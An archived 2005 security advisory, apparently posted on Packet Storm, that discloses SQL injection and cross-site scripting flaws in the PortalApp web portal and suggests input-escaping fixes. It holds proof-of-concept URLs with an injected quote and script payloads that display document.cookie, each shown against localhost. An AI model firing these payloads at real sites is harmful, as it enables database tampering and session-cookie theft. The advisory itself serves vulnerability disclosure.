what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

portalApp.txt

portalApp.txt
Posted Mar 29, 2005
Authored by Diabolic Crab | Site hackerscenter.com

Multiple SQL injection and cross site scripting vulnerabilities have been discovered in PortalApp. Sample exploitation provided.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | ef8774a270f7cf5c3c385dd44115e3f3ab80760745b1a26d5d9c111db428ebee

portalApp.txt

Change Mirror Download
This is a multi-part message in MIME format.

------=_NextPart_000_0046_01C53454.58BFA8E0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Severity: Medium
Title: Multiple sql injection, and xss vulnerabilities in PortalApp.
Date: March 30, 2005
Vendor: AspApp
Vendor site: http://www.aspapp.com

Summary:
There are multiple sql injection, xss vulnerabilities in the PortalApp.

Proof of Concept Exploits:

http://localhost/ad_click.asp?banner_id=3D'SQL_INJECTION
Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'banner_id =3D =
'SQL_INJECTION'.

/ad_click.asp, line 14


http://localhost/content.asp?contenttype=3D%22%3E%3Cscript%3Ealert(docume=
nt.cookie)%3C/script%3E
Pops cookie


http://localhost/content.asp?do_search=3D1&keywords=3D'%3E%3Cscript%3Eale=
rt(document.cookie)%3C/script%3E
Pops cookie


Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(), =
mysql_real_escape_string() and other functions for input validation =
before passing user input to the mysql database, or before echoing data =
on the screen, would solve these problems.

Author:
These vulnerabilties have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. =
Lookout for my soon to come out book on Secure coding with php.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQkjxjyZV5e8av/DUEQJTagCeMdB58bY72TMo6mITsSHLByjCT/MAnjRM
n0K6nk2uxIlFknfglJIoUkqq
=3DV5fo
-----END PGP SIGNATURE-----

------=_NextPart_000_0046_01C53454.58BFA8E0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff><FONT face=3DArial size=3D2>
<DIV><BR>-----BEGIN PGP SIGNED MESSAGE-----<BR>Hash: SHA1</DIV>
<DIV>&nbsp;</DIV>
<DIV>Dcrab 's Security Advisory<BR><A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A><BR><A=20
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=
/DIV>
<DIV>&nbsp;</DIV>
<DIV>Severity:&nbsp; Medium<BR>Title: Multiple sql injection, and xss=20
vulnerabilities in PortalApp.<BR>Date: March&nbsp; 30,&nbsp; =
2005<BR>Vendor:=20
AspApp<BR>Vendor site: <A=20
href=3D"http://www.aspapp.com">http://www.aspapp.com</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>Summary:<BR>There are multiple sql injection, xss vulnerabilities =
in the=20
PortalApp.</DIV>
<DIV>&nbsp;</DIV>
<DIV>Proof of Concept Exploits:</DIV>
<DIV>&nbsp;</DIV>
<DIV><A=20
href=3D"http://localhost/ad_click.asp?banner_id=3D'SQL_INJECTION">http://=
localhost/ad_click.asp?banner_id=3D'SQL_INJECTION</A><BR>Microsoft=20
JET Database Engine error '80040e14'</DIV>
<DIV>&nbsp;</DIV>
<DIV>Syntax error in string in query expression 'banner_id =3D=20
'SQL_INJECTION'.</DIV>
<DIV>&nbsp;</DIV>
<DIV>/ad_click.asp, line 14</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://localhost/content.asp?contenttype=3D%22%3E%3Cscript%3Ealer=
t(document.cookie)%3C/script%3E">http://localhost/content.asp?contenttype=
=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://localhost/content.asp?do_search=3D1&keywords=3D'%3E%3C=
script%3Ealert(document.cookie)%3C/script%3E">http://localhost/content.as=
p?do_search=3D1&keywords=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/=
script%3E</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>Possible fix: The usage of htmlspeacialchars(), =
mysql_escape_string(),=20
mysql_real_escape_string() and other functions for input validation =
before=20
passing user input to the mysql database, or before echoing data on the =
screen,=20
would solve these problems.</DIV>
<DIV>&nbsp;</DIV>
<DIV>Author:<BR>These vulnerabilties have been found and released by =
Diabolic=20
Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel =
free to=20
contact me regarding these vulnerabilities. You can find me at, <A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or <A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A>.=20
Lookout for my soon to come out book on Secure coding with php.</DIV>
<DIV>&nbsp;</DIV>
<DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed =
for=20
commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>iQA/AwUBQkjxjyZV5e8av/DUEQJTagCeMdB58bY72TMo6mITsSHLByjCT/MAnjRM<BR>=
n0K6nk2uxIlFknfglJIoUkqq<BR>=3DV5fo<BR>-----END=20
PGP SIGNATURE-----<BR></FONT></DIV></BODY></HTML>

------=_NextPart_000_0046_01C53454.58BFA8E0--
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close